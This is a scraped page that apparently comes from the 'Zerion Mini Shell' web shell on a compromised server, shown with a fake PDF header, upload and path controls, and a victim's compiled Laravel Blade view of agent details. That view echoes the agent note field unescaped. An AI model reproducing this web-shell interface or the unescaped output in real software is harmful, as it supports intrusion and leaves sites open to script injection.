%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home/silvzytp/dsr_code/storage/framework/views/
Upload File :
Create Path :
Current File : /home/silvzytp/dsr_code/storage/framework/views/3d1a959847c9cb2c963e6d8b8d195e93fdfcd855.php

<?php $__env->startSection('title', $siteTitle); ?>

<?php $__env->startPush('styles'); ?>

<?php $__env->stopPush(); ?>

<?php $__env->startSection('content'); ?>

    <div class="row">
        <div class="col-12 col-md-8 mx-auto">
            <div class="ibox">
                <div class="ibox-head">
                    <div class="ibox-title w-100">Details - <?php echo e($agent->name); ?></div>
                </div>
                <div class="ibox-body px-0">
                    <table class="w-100 table table-sm table-borderless border-secondary">
                        <tr>
                            <td class="text-left"><strong>Role Name:</strong></td>
                            <td class="text-left"><span class="badge badge-danger">Agent</span></td>
                        </tr>
                        <tr>
                            <td class="text-left"><strong>Full Name:</strong></td>
                            <td class="text-left"><?php echo e($agent->name); ?></td>
                        </tr>
                        <tr>
                            <td class="text-left"><strong>Email:</strong></td>
                            <td class="text-left"><?php echo e($agent->email); ?>'</td>
                        </tr>
                        <tr>
                            <td class="text-left"><strong>Phone No:</strong></td>
                            <td class="text-left"><?php echo e($agent->phone_no ?? 'N/A'); ?></td>
                        </tr>
                        <tr>
                            <td class="text-left"><strong>Target:</strong></td>
                            <td class="text-left"><?php echo e($agent->target ?? 0.00); ?></td>
                        </tr>
                        <tr>
                            <td class="text-left"><strong>Description:</strong></td>
                            <td class="text-left"><?php echo $agent->note ?? 'N/A'; ?></td>
                        </tr>
                        <tr>
                            <td class="text-left"><strong>Created At</strong></td>
                            <td class="text-left"><?php echo e(date_format($agent->created_at, 'd-m-Y')); ?></td>
                        </tr>
                    </table>
                </div>
            </div>
        </div>
    </div>

<?php $__env->stopSection(); ?>

<?php $__env->startPush('scripts'); ?>

<?php $__env->stopPush(); ?>

<?php echo $__env->make('layouts.backend', \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?><?php /**PATH /home/silvzytp/dsr_code/resources/views/backend/pages/agents/view.blade.php ENDPATH**/ ?>

Zerion Mini Shell 1.0